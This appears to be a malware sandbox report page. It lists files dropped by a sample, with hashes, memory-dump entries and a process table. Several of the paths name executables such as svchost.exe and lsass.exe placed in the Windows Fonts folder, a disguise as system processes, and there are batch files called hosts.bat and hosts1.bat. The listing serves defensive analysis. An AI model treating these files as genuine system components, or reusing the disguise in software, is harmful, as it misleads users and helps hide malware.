cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\??\c:\windows\Fonts\lsass.exe
Filesize
1.4MB

MD5
ec0bc41f1e623de85d1be23c55cc5dd8

SHA1
d1912bc5d7180b89af68fc7996a943df90b4106a

SHA256
0b7585b424e77d63186607a4b1e81d65849ce62e3bd6efd52f2b822378549981

SHA512
ea7aaf463a9fc6d28d116516f7c1f36c814f50dcd35779ae8b897155ef6c17dec25b4a2a0a05a8a518e32f2632fda8821c080b8fe2e27ee7613dcff07c15ed8e

Download Submit
\??\c:\windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\??\c:\windows\hosts.bat
Filesize
4KB

MD5
9459b1d319aab5c7773a1b24e3a25346

SHA1
efbd37a1b9fe93aa8b0ae23dba0999fc5437447c

SHA256
c21313ed87306ff6d0db8c0ef18fd89607fb068dcd4a82dcbd580b772dfe0663

SHA512
609988a8eb4d64951f5ea60083faf6fb4ac3063f6bfce780cab832c59219433bcd231262c4d4bcf7dac8e3860b2189ae71607dd1377bf98b65f75d1dcbc359e3

Download Submit
\??\c:\windows\hosts1.bat
Filesize
4KB

MD5
a98a5e1a59b4b05a4769924dfa541c53

SHA1
f5e4fe1c2959ca656fe76547bc600aedace2e02e

SHA256
cc5ec7687541b94eb3d3ebf025b07006aec46763f01c4428c30232bea51f562c

SHA512
189cf76f85a2178e8e58a15bf8e7f7668dc07e77da04e068a3fbc59acad59136fec8bf7caccb247659a5d6d44738e829e1d439d7dedd18659bc9f08ddb5874f0

Download Submit
\Windows\Fonts\KvMonXP.exe
Filesize
775KB

MD5
8a8045c0472e3e90257d51a236ff62dd

SHA1
2d9cfd9bfe69e7daf9a695df48467d20904157d6

SHA256
d92cfffbd3060aa141eab23a8792aa05a0494a6323f92d10d457a8f89eab62c2

SHA512
1d65f219dad3fa0762019565300430234e690c8b4b74a941dd82785c75fd70945b1db94684af7aa0238f5d76b4c6ff0195d4f94ad34818868f86f01c1cbe4068

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
memory/276-93-0x0000000000000000-mapping.dmp

Download
memory/316-63-0x0000000000000000-mapping.dmp

Download
memory/360-72-0x0000000000000000-mapping.dmp

Download
memory/368-68-0x0000000000000000-mapping.dmp

Download
memory/520-90-0x0000000000000000-mapping.dmp

Download
memory/520-65-0x0000000000000000-mapping.dmp

Download
memory/568-64-0x0000000000000000-mapping.dmp

Download
memory/580-66-0x0000000000000000-mapping.dmp

Download
memory/604-127-0x0000000000000000-mapping.dmp

Download
memory/664-134-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/664-116-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/664-105-0x0000000000000000-mapping.dmp

Download
memory/688-126-0x0000000000000000-mapping.dmp

Download
memory/688-56-0x0000000000000000-mapping.dmp

Download
memory/772-95-0x0000000000000000-mapping.dmp

Download
memory/812-87-0x0000000000000000-mapping.dmp

Download
memory/836-91-0x0000000000000000-mapping.dmp

Download
memory/848-84-0x0000000000000000-mapping.dmp

Download
memory/880-175-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/880-132-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/880-98-0x0000000000000000-mapping.dmp

Download
memory/904-78-0x0000000000000000-mapping.dmp

Download
memory/956-82-0x0000000000000000-mapping.dmp

Download
memory/956-58-0x0000000000000000-mapping.dmp

Download
memory/980-99-0x0000000000000000-mapping.dmp

Download
memory/1036-133-0x0000000000000000-mapping.dmp

Download
memory/1036-100-0x0000000000000000-mapping.dmp

Download
memory/1160-129-0x0000000000000000-mapping.dmp

Download
memory/1164-113-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1164-139-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1164-102-0x0000000000000000-mapping.dmp

Download
memory/1236-61-0x0000000000000000-mapping.dmp

Download
memory/1260-128-0x0000000000000000-mapping.dmp

Download
memory/1264-60-0x0000000000000000-mapping.dmp

Download
memory/1264-88-0x0000000000000000-mapping.dmp

Download
memory/1296-89-0x0000000000000000-mapping.dmp

Download
memory/1300-80-0x0000000000000000-mapping.dmp

Download
memory/1324-59-0x0000000000000000-mapping.dmp

Download
memory/1332-122-0x0000000000000000-mapping.dmp

Download
memory/1336-97-0x0000000000000000-mapping.dmp

Download
memory/1412-83-0x0000000000000000-mapping.dmp

Download
memory/1416-96-0x0000000000000000-mapping.dmp

Download
memory/1480-125-0x0000000000000000-mapping.dmp

Download
memory/1492-114-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1492-104-0x0000000000000000-mapping.dmp

Download
memory/1492-135-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1500-86-0x0000000000000000-mapping.dmp

Download
memory/1580-74-0x0000000000000000-mapping.dmp

Download
memory/1588-111-0x0000000000000000-mapping.dmp

Download
memory/1628-73-0x0000000000000000-mapping.dmp

Download
memory/1704-67-0x0000000000000000-mapping.dmp

Download
memory/1716-131-0x0000000000000000-mapping.dmp

Download
memory/1724-77-0x0000000000000000-mapping.dmp

Download
memory/1728-57-0x0000000000000000-mapping.dmp

Download
memory/1760-121-0x0000000000000000-mapping.dmp

Download
memory/1764-70-0x0000000000000000-mapping.dmp

Download
memory/1792-69-0x0000000000000000-mapping.dmp

Download
memory/1808-76-0x0000000000000000-mapping.dmp

Download
memory/1844-79-0x0000000000000000-mapping.dmp

Download
memory/1868-107-0x0000000000000000-mapping.dmp

Download
memory/1868-115-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1868-171-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1892-55-0x0000000000400000-0x0000000000656000-memory.dmp

Filesize
2.3MB

Download
memory/1892-54-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

Filesize
8KB

Download
memory/1892-112-0x0000000002160000-0x00000000021B3000-memory.dmp

Filesize
332KB

Download
memory/1936-108-0x0000000000000000-mapping.dmp

Download
memory/1952-85-0x0000000000000000-mapping.dmp

Download
memory/1956-71-0x0000000000000000-mapping.dmp

Download
memory/1976-75-0x0000000000000000-mapping.dmp

Download
memory/1992-119-0x0000000000000000-mapping.dmp

Download
memory/1996-92-0x0000000000000000-mapping.dmp

Download
memory/2004-120-0x0000000000000000-mapping.dmp

Download
memory/2008-94-0x0000000000000000-mapping.dmp

Download
memory/2028-124-0x0000000000000000-mapping.dmp

Download
memory/2028-62-0x0000000000000000-mapping.dmp

Download
memory/2036-81-0x0000000000000000-mapping.dmp

Download
memory/2044-123-0x0000000000000000-mapping.dmp

Download
memory/2052-166-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2540-165-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2540-153-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2548-149-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2556-154-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2556-156-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2564-152-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2564-174-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2776-173-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2776-176-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3048-170-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3056-168-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3064-172-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download

pid	process
1892	42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
2596
2616
2604
2636
772
2132
2112
2056
2776	svchost.exe